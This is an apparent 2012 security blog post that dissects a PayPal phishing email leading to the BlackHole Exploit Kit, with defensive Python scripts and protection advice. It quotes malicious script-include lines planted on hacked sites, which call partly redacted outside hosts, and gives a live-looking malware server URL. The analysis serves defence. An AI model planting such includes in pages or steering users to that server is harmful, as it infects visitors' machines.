Anatomy of a PayPal email scam leading to malware
May 24, 2012
Cyber-criminals are once again ramping up their email scam campaigns to deliver messages with links to malware servers they control. One of the recent scams, happening this week, is a PayPal Payment scam, with links leading to an exploit attack kit.
The most recent PayPal scam arrives in your Inbox with the Subject: "You sent a payment" and a spoofed From address: "[email protected]" <[email protected]>. However, if you were to look at the normally hidden header information, you would see that the email actually came from an unrelated server. The PayPal scam I am looking at came from Brazil:
Received: from [187.56.96.53] (helo=telesp.net.br).
See my article from 2006 for suggestions on how to display email headers.
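To show how the header check above can be automated, here is an added Python example (mine, not code from the article) that parses a constructed message modelled on the scam. The From address, the recipient and the inner relay are placeholders; the origin hop reuses the Received line quoted above. It walks the Received chain to the hop where the message entered the mail system and compares that host with the domain the From header claims.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from ipaddress import ip_address

# Constructed sample modelled on the scam message. The From address, recipient and
# inner relay are placeholders; the origin hop reuses the Received line from the article.
RAW_MESSAGE = b"""\
Received: from mail.example.net (mail.example.net [192.0.2.10])
\tby mx.example.net with esmtp; Thu, 24 May 2012 08:12:40 -0400
Received: from [187.56.96.53] (helo=telesp.net.br)
\tby mail.example.net with esmtp; Thu, 24 May 2012 08:12:31 -0400
From: "service@paypal.com" <service@paypal.com>
To: victim@example.net
Subject: You sent a payment
Content-Type: text/plain; charset="utf-8"

You sent a payment Transaction ID: 2T004487YM209135A
"""

# "from <name> [<ip>]" with an optional "(helo=<name>)" clause, as Exim writes it.
RECEIVED_RE = re.compile(
    r"from\s+(?P<name>[\w.-]+)?[^\[\d]*\[?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]?"
    r"(?:\s*\(\s*helo=(?P<helo>[\w.-]+)\s*\))?",
    re.IGNORECASE,
)


def parse_received(value):
    """Pull the sending host name, IP and HELO name out of one Received header."""
    flat = " ".join(str(value).split())  # unfold continuation lines
    m = RECEIVED_RE.search(flat)
    if not m:
        return None
    return {"name": m.group("name"), "ip": m.group("ip"), "helo": m.group("helo")}


def triage(raw):
    """Compare the From domain with the hop where the message entered the mail system."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    _, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = from_addr.rpartition("@")[2].lower()

    hops = [h for h in (parse_received(v) for v in msg.get_all("Received", [])) if h]
    # Headers are prepended by each relay, so the bottom-most one is the first hop.
    origin = hops[-1] if hops else None

    flags = []
    if origin is None:
        flags.append("no parseable Received header")
    else:
        claimed = (origin["helo"] or origin["name"] or "").lower()
        if from_domain and not claimed.endswith(from_domain):
            flags.append("origin host does not belong to From domain")
        try:
            if ip_address(origin["ip"]).is_private:
                flags.append("origin IP is private (internal submission)")
        except ValueError:
            flags.append("origin IP is malformed")
    return {
        "from_domain": from_domain,
        "origin_ip": origin["ip"] if origin else None,
        "origin_host": (origin["helo"] or origin["name"]) if origin else None,
        "subject": str(msg.get("Subject", "")),
        "flags": flags,
    }


if __name__ == "__main__":
    for key, val in triage(RAW_MESSAGE).items():
        print(f"{key}: {val}")
```

Two caveats when reading the result. The helo name is whatever the sending machine announced, so the bracketed IP recorded by the receiving server is the reliable part of the line. And a sender can append forged Received lines of its own, so trust only the hop recorded by a server you or your provider control; the SPF and DKIM results that server records are the proper check for a spoofed From address.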
The PayPal scam message body text is meant both to pique the curiosity of the recipient (with the dollar amount they allegedly sent) and to delay their checking of their PayPal account to see whether they really made such a payment. Here is how the crooks accomplish these two tasks:
You sent a payment Transaction ID: 2T004487YM209135A
Dear PayPal User, You sent a payment for $334.85 USD to Otis Bauer (or another name). Please note that it may take a little while for this payment to appear in the Recent Activity list on your Account Overview...This payment was sent using your bank account. By using your bank account to send money...
The call to action that they want victims to perform is NOT to log in to their PayPal accounts to investigate this scam (the "Please note that it may take a little while..." sentence above is there to discourage exactly that), but to click on poisoned links wrapped around keywords in the message body. These links are wrapped around every word that a PayPal user would normally expect to click to see details about their account. The linked words were as follows:
- 2T004487YM209135A
- View the details of this transaction online
- Help Center | Resolution Center | Security Center
- h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_history (visible link text only; the actual link target was different)
- h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us (visible link text only; the actual link target was different)
Each of the above anchor words was wrapped in a link to a compromised website that contained the following content (planted there when the site was hacked):
WAIT PLEASE
Loading...
<script type="text/javascript" src="h**p://REMOVED.com.tr/fu25e3pr/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED-epices.com/X1RrZw4G/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED.com.au/Xsqgw1AK/js.js"></script>
Each of the three lines on the compromised page is a JavaScript include: the victim's browser fetches the script from the external URL I removed and runs it as if it were part of the page. Whichever of the three still responds (some may have been taken offline, or cleaned) returns further JavaScript that redirects the browser to another URL hard-coded into that script. In the case being analyzed that poisoned link goes to: h**p://69.194.196.44/showthread.php?t=4a6d866826776084 (DO NOT GO THERE!).
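As an added illustration (my code, not the article's), the following Python script automates the two things this section shows by hand: it checks the email body for links whose visible text names one host while the href points at another, counts how many links share the same target host, lists the script includes a landing page pulls from other hosts, and extracts hard-coded redirect targets from a script. The HTML, the hostnames, the paths and the redirect snippet are constructed placeholders modelled on the scam, not the real sites or the real js.js.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples standing in for the scam email body and the hacked landing
# page described above. Hostnames, paths and the redirect target are placeholders.
EMAIL_HTML = """
<p>You sent a payment Transaction ID:
<a href="http://compromised-a.example/abc123/">2T004487YM209135A</a></p>
<p><a href="http://compromised-a.example/abc123/">View the details of this transaction online</a></p>
<p><a href="http://compromised-a.example/abc123/">Help Center</a> |
<a href="http://compromised-a.example/abc123/">Resolution Center</a></p>
<p><a href="http://compromised-a.example/abc123/">https://www.paypal.com/us/cgi-bin/webscr?cmd=_history</a></p>
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us">Contact Us</a></p>
"""

LANDING_HTML = """
<html><body>WAIT PLEASE<br>Loading...
<script type="text/javascript" src="http://compromised-b.example/x1/js.js"></script>
<script type="text/javascript" src="http://compromised-c.example/x2/js.js"></script>
<script type="text/javascript" src="/theme/site.js"></script>
</body></html>
"""

# What one of the remote js.js files might contain (constructed, not the real script).
REDIRECT_JS = 'document.location.href = "http://203.0.113.44/showthread.php?t=0123456789abcdef";'


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every anchor and the src of every script tag."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self.scripts = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


# A hostname-looking token inside visible link text, with or without a scheme.
HOST_IN_TEXT = re.compile(r"(?:https?://)?((?:[\w-]+\.)+[a-z]{2,})", re.IGNORECASE)

# location = "..." / location.href = "..." / location.replace("...") / location.assign("...")
REDIRECT_RE = re.compile(
    r"""location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
    r"""|location\.(?:replace|assign)\(\s*['"]([^'"]+)['"]"""
)


def host_of(url, base=None):
    """Host part of a URL; relative URLs resolve to the page's own host."""
    return (urlparse(url).hostname or base or "").lower()


def check_anchors(html):
    """Flag links whose visible text names a host other than the href's host,
    and count how many links point at each host."""
    p = LinkCollector()
    p.feed(html)
    findings = []
    for href, text in p.anchors:
        real = host_of(href)
        m = HOST_IN_TEXT.search(text)
        shown = m.group(1).lower() if m else None
        if shown and shown != real:
            findings.append((text, href, f"visible host {shown} != target {real}"))
    return findings, Counter(host_of(h) for h, _ in p.anchors)


def check_scripts(html, page_host):
    """List script includes pulled from hosts other than the page itself."""
    p = LinkCollector()
    p.feed(html)
    return [s for s in p.scripts if host_of(s, page_host) != page_host.lower()]


def find_redirects(js):
    """Extract hard-coded redirect targets from a piece of JavaScript."""
    return [m.group(1) or m.group(2) for m in REDIRECT_RE.finditer(js)]


if __name__ == "__main__":
    findings, hosts = check_anchors(EMAIL_HTML)
    print("mismatched links:", findings)
    print("links per target host:", dict(hosts))
    print("external scripts:", check_scripts(LANDING_HTML, "compromised-a.example"))
    print("redirects to:", find_redirects(REDIRECT_JS))
```

The host comparison is the same check a reader does by hovering over a link, just done for every link at once; the per-host count catches the pattern in this scam, where every clickable word leads to the same hacked site. The redirect scan is deliberately simple and only catches plain string assignments; real kit loaders usually obfuscate the target, so treat a script include from an unrelated host as the stronger signal.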
Whois 69.194.196.44?
Answer: Solar VPS, in Rutherford, NJ, USA.
What happens when you are redirected to this VPS server? You get attacked by the BlackHole Exploit Kit, which first and foremost probes for any exploitable versions of Java on your computer.
How can one protect themselves from such exploits?
Your first line of defense is your own hand on the pointing device. Whether you use a traditional mouse, trackball, touch-pad, stylus, or touch-screen, let the pointer hover over a link before you click on it. All modern browsers display the actual target URL of a link in the status bar as you hover over it, and it is that target, not the link's visible text, that matters: in this scam the visible text reads h**ps://www.paypal.com/... while the target is a hacked site. One caveat: a web page's own JavaScript can change where a click goes after you have hovered, so the status bar is a good first check, not proof. All standalone desktop email clients have an option to show or hide the Status Bar. I always show my Status bar.
If you use Microsoft Windows Live Mail (WLM) as your email client and you don't see a Status Bar along the bottom of its window, click on the tab labeled View (under the title bar, listed among Home | Folders | View | Accounts). Look to the right of the options and buttons that appear under the View tab, find the one labeled "Status bar" and click on it. The Status bar will instantly appear at the bottom of the WLM window. If you preview your emails in the Reading Pane (View - "Reading Pane"), hovering over a link there shows its URL in that Status bar. Even if you don't use the Reading Pane, once you open an email message and hover over links in it, the URLs will be displayed in the Status bar of that opened message window. Fortunately, that Status bar is not turned off even if the main interface has its Status bar off.
Another way to protect yourself from being exploited, in case you do accidentally click on a poisoned link, is to use the Firefox browser along with the NoScript Add-on. I operate this way. NoScript is an extension that one can manually install into the Firefox browser. It disables JavaScript and other active content by default; you have to actively instruct it to allow scripting for this or that website or URL, either permanently or temporarily. Chances are very small that you will have white-listed one of the domains compromised by the criminals running these BlackHole scams. Therefore, should you click on a hostile link that leads to a JavaScript include that redirects to a malware server, you may see the "Please Wait, Loading" message, but nothing more will happen (Yes, I have checked this out).
Even if you go directly to the BlackHole exploit server, nothing will happen if you have JavaScript disabled. But, since the majority of people browsing the Internet do not block JavaScript, "stuff" may well happen to you if you go there.
The BlackHole Exploit Kit first attacks Java technology, if present (see: Do I have Java installed?). Java is NOT the same as JavaScript. They are horses of a different color. Java code is compiled into bytecode that runs on the Java Runtime Environment; in a browser, the Java plug-in runs such code as an Applet, with far more reach into your computer than a browser script normally gets. JavaScript is an interpreted language that normally operates only inside web browsers, in browser emulators used by developers, in Adobe Reader and Acrobat, or in certain other specialized applications. If your computer has any out-dated version of Java installed, the BlackHole Exploit Kit can exploit it and take over the machine.
If you either do not have Java installed, or only have the most recent version, which has been patched against known vulnerabilities, the BlackHole Kit might probe you for an out-dated version of Adobe Flash or Reader. It really depends on which version of the BlackHole kit you are lured to, as the one I am looking at today only targets Java. Some email scams have links to the Phoenix Exploit Pack, which definitely includes Flash, Reader and ActiveX attacks in addition to Java. This means you have to make sure that you stay up-to-date with patching all plug-ins that are accessed through a web browser.
Thankfully, Oracle's Java, Adobe's Flash and Reader and Apple's QuickTime plug-ins all have an optional automatic check for updates. I strongly advise you to enable those automatic updates and have them downloaded and installed as they become available. If you do not actually need a plug-in such as Java in your browser, disabling or uninstalling it closes that door entirely.
Finally, if you currently operate your computer with Administrator privileges, read my articles [1] [2] [3] about lowering your privileges to a Limited, Power, or Standard User account instead. This significantly reduces the likelihood of being successfully exploited by a drive-by attack, because the exploit runs with your privileges and can install no more than your account is allowed to. Yes, you could still be tricked into agreeing to install a Trojan by cleverly worded social engineering. But at least you would have a chance to see it coming and stop it, whereas with Administrator privileges the malware can just walk on in and sit right down.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.